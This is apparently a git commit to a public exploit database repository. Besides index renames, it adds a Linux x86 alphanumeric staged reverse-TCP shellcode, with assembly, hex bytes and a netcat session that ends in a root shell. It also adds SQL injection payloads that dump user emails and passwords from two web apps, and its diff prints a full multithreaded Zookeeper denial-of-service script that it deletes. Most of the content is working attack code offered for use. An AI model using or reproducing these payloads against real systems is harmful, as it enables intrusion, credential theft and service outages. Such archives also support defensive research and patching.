From d1a0e8f9fdc9b5ef102abe1eab9f33e2aa6c92cc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 9 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-09 3 new exploits Zookeeper 3.5.2 - Denial of Service Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes) YapBB 1.2 - (forumID) Blind SQL Injection YapBB 1.2 - 'forumID' Parameter Blind SQL Injection ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD ClearBudget 0.6.1 - Insecure Database Download phpYabs 0.1.2 - (Azione) Remote File Inclusion phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion IF-CMS 2.0 - 'frame.php id' Blind SQL Injection IF-CMS 2.0 - 'id' Parameter Blind SQL Injection BusinessSpace 1.2 - 'id' SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection BusinessSpace 1.2 - 'id' Parameter SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection FlexCMS - (catId) SQL Injection FlexCMS 2.5 - 'catId' Parameter SQL Injection Thyme 1.3 - (export_to) Local File Inclusion Papoo CMS 3.x - (pfadhier) Local File Inclusion q-news 2.0 - Remote Command Execution Potato News 1.0.0 - (user) Local File Inclusion Thyme 1.3 - 'export_to' Parameter Local File Inclusion Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion Q-News 2.0 - Remote Command Execution Potato News 1.0.0 - Local File Inclusion Mynews 0_10 - Authentication Bypass Mynews 0.10 - Authentication Bypass Muviko Video CMS - SQL Injection Multi Outlets POS 3.1 - 'id' Parameter SQL Injection --- files.csv | 28 ++-- platforms/lin_x86/shellcode/41282.nasm | 198 +++++++++++++++++++++++++ platforms/linux/dos/41277.py | 86 ----------- platforms/linux/webapps/41223.py | 21 +-- platforms/php/webapps/41279.txt | 21 +++ platforms/php/webapps/41280.txt | 18 +++ 6 files changed, 257 insertions(+), 115 deletions(-) create mode 100755 platforms/lin_x86/shellcode/41282.nasm delete mode 100755 platforms/linux/dos/41277.py create mode 100755 platforms/php/webapps/41279.txt create mode 100755 platforms/php/webapps/41280.txt diff --git a/files.csv b/files.csv index f0dc45538..867869a7e 100644 --- a/files.csv +++ b/files.csv @@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0 -41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 @@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 +41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 -7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 +7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 -7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 +7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 @@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 -8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 +8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 -8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 +8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 -8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 -8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0 +8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0 +8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 -8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0 +8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0 -8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 -8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 -8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0 -8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 +8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0 +8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0 +8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0 +8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 -8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 +8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 @@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port 41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0 41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0 41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0 +41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0 +41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/lin_x86/shellcode/41282.nasm b/platforms/lin_x86/shellcode/41282.nasm new file mode 100755 index 000000000..e44124147 --- /dev/null +++ b/platforms/lin_x86/shellcode/41282.nasm @@ -0,0 +1,198 @@ +########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ######## + ########### Author: Snir Levi, Applitects ############# + ## 103 Bytes ## + +date: 9.2.17 +Automatic python shellcode handler (with stage preset send) will be ready soon: +https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/ + + +IP - 127.0.0.1 +PORT - 4444 + +#### Stage Alphanumeric shellcode: ##### +Stage 1: +dup2 stdin syscall: + +WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP + +W push edi +X pop eax +W push edi +[ pop ebx +j? push 0x3f +X pop eax +V push esi +[ pop ebx +W push edi +Y pop ecx +P push eax +X pop eax +P push eax +X pop EAX + +Stage 2: +dup2 stdout syscall: + +WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX + +W push edi +X pop eax +W push edi +[ pop ebx +j? push 0x3f +X pop eax +V push esi +[ pop ebx +W push edi +Y pop ecx +A inc ecx (ecx =1) +P push eax +X pop eax +P push eax + +Stage 3: +dup2 stderr syscall: + +WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP + +W push edi +X pop eax +W push edi +[ pop ebx +j? push 0x3f +X pop eax +V push esi +[ pop ebx +W push edi +Y pop ecx +A*2 inc ecx (ecx = 2) +P push eax +X pop eax +A inc ecx + +Stage 3: +execve /bin/sh: + +j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ + +j0 push 0x30 +X pop eax +H*32 dec eax //eax = 0x0b +W push edi +Y pop ecx +W push edi +Z pop edx +W push edi // null terminator +h//sh push 0x68732f2f //sh +h/bin push 0x6e69622f /bin +T push esp +[ pop ebx + +Usage: Victim Executes the shellcode, and opens tcp connection + +Stage: + After Connection is established, send the 4 stages ***separately*** + + nc -lvp 4444 + connect to [127.0.0.1] from localhost [127.0.0.1] (port) + WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP + WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX + WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP + j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ + + whoami + root + id + uid=0(root) gid=0(root) groups=0(root) + + +global _start + + +_start: + + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 102 - socketcall + ; socket = 0x01 + + xor eax,eax + xor esi,esi + push eax + pop edi + push eax + mov al, 0x66 + push byte 0x1 + pop ebx + push byte ebx + push byte 0x2 + mov ecx, esp + int 0x80 + + xchg esi, eax; save sock result + + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = inet_addr("127.0.0.1") + + push byte 0x1 + pop edx + shl edx, 24 + mov dl, 0x7f ;edx = 127.0.0.1 (hex) + push edx + push word 0x5c11 ;port 4444 + push word 0x02 + + ; connect(sock, (struct sockaddr *)&server, sockaddr_len) + + mov al, 0x66 + mov bl, 0x3 + mov ecx, esp + push byte 0x10 + push ecx + push esi + mov ecx ,esp + int 0x80 + + +stageAddress: ;saves stage address to edx + mov edx, [esp] + sub bl,3 + jnz stage + +call near stageAddress + + ;recv(int sockfd, void *buf, size_t len, int flags); + +stage: + mov al, 0x66 + mov bl, 10 + push edi + push word 100 ; buffer size + push edi + push esi ; socketfd + mov [esp+4],esp ; sets esp as recv buffer + mov ecx,esp + int 0x80 + mov al, 0xcd + mov ah, 0x80 ; eax = int 0x80 + mov bl, 0xFF + mov bh, 0xE2 ; ebx = jmp edx + mov [esp+57],al + mov [esp+58],ah + mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage + jmp esp + + + +unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a +\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52 +\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1 +\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff +\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0 +\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a +\x89\x5c\x24\x3b\xff\xe4" + + diff --git a/platforms/linux/dos/41277.py b/platforms/linux/dos/41277.py deleted file mode 100755 index f0e58ed68..000000000 --- a/platforms/linux/dos/41277.py +++ /dev/null @@ -1,86 +0,0 @@ -#!/usr/bin/python - -# Exploit Title: Zookeeper Client Denial Of Service (Port 2181) -# Date: 2/7/2017 -# Exploit Author: Brandon Dennis -# Email: bdennis@mail.hodges.edu -# Software Link: http://zookeeper.apache.org/releases.html#download -# Zookeeper Version: 3.5.2 -# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86 -# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. -# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. -# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper. -# This should effect Linux x86 & x64 as well - - - -import time -import os -import threading -import sys -import socket - -numOfThreads = 1 -exitStr = "n" -stop_threads = False -threads = [] -ipAddress = "192.168.1.5" #Change this -port = 2181 - -def sendCommand(ipAddress, port): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((ipAddress, port)) - s.send("wchp\r".encode("utf-8")) - s.recv(1024) - s.send("wchc\r".encode("utf-8")) - s.close() - except: - pass - - -def runCMD(id, stop, ipAddress, port): - while True: - sendCommand(ipAddress, port) - if stop(): - break - return - -def welcomeBanner(): - banner = """ _______ __ _____ _ -|___ | | / / / __ \ | | - / /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __ - / / | \ | | | '__/ _` / __| '_ \ / _ | '__| -./ /__| |\ \ | \__/| | | (_| \__ | | | | __| | -\_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_| - - By: Brandon Dennis - Email: bdennis@mail.hodges.edu - """ - print(banner) - - -welcomeBanner() -numOfThreads = int(input("How many threads do you want to use: ")) -print ("Startin Up Threads...") -for i in range(numOfThreads): - t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port)) - threads.append(t) - t.start() -print("Threads are now started...") - - -while exitStr != "y": - inpt = input("Do you wish to stop threads(y): ") - - if inpt == "y": - exitStr = "y" - -print("\nStopping Threads...") -stop_threads = True -for thread in threads: - thread.join() - -print("Threads are now stopped...") -sys.exit(0); - diff --git a/platforms/linux/webapps/41223.py b/platforms/linux/webapps/41223.py index a163137cd..7269a4019 100755 --- a/platforms/linux/webapps/41223.py +++ b/platforms/linux/webapps/41223.py @@ -1,14 +1,3 @@ -# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC -# Date: 2017-02-02 -# Exploit Author: @leonjza -# Vendor Homepage: https://wordpress.org/ -# Software Link: https://wordpress.org/wordpress-4.7.zip -# Version: Wordpress 4.7.0/4.7.1 -# Tested on: Debian Jessie -# -# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab -# - # 2017 - @leonjza # # Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC @@ -61,7 +50,7 @@ def get_posts(api_base): posts = json.loads(respone.read()) for post in posts: - print(' - Post ID: {}, Title: {}, Url: {}' + print(' - Post ID: {0}, Title: {1}, Url: {2}' .format(post['id'], post['title']['rendered'], post['link'])) @@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content): req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req).read() - print('* Post updated. Check it out at {}'.format(json.loads(response)['link'])) + print('* Post updated. Check it out at {0}'.format(json.loads(response)['link'])) def print_usage(): - print('Usage: {} (optional: )'.format(__file__)) + print('Usage: {0} (optional: )'.format(__file__)) if __name__ == '__main__': @@ -98,7 +87,7 @@ if __name__ == '__main__': print('* Discovering API Endpoint') api_url = get_api_url(sys.argv[1]) - print('* API lives at: {}'.format(api_url)) + print('* API lives at: {0}'.format(api_url)) # if we only have a url, show the posts we have have if len(sys.argv) < 3: @@ -108,7 +97,7 @@ if __name__ == '__main__': sys.exit(0) # if we get here, we have what we need to update a post! - print('* Updating post {}'.format(sys.argv[2])) + print('* Updating post {0}'.format(sys.argv[2])) with open(sys.argv[3], 'r') as content: new_content = content.readlines() diff --git a/platforms/php/webapps/41279.txt b/platforms/php/webapps/41279.txt new file mode 100755 index 000000000..089da4571 --- /dev/null +++ b/platforms/php/webapps/41279.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Muviko Video CMS Script - SQL Injection +# Google Dork: N/A +# Date: 08.02.2017 +# Vendor Homepage: https://muvikoscript.com/ +# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086 +# Demo: https://demo.muvikoscript.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search.php?q=[SQL] +# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- - +# http://localhost/[PATH]/category.php?id=[SQL] +# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41280.txt b/platforms/php/webapps/41280.txt new file mode 100755 index 000000000..50a70b0ad --- /dev/null +++ b/platforms/php/webapps/41280.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection +# Google Dork: N/A +# Date: 08.02.2017 +# Vendor Homepage: http://prosoft-apps.com/ +# Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742 +# Demo: http://pos.prosoft-apps.com/pos/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/view_invoice?id=[SQL] +# Etc... +# # # # # \ No newline at end of file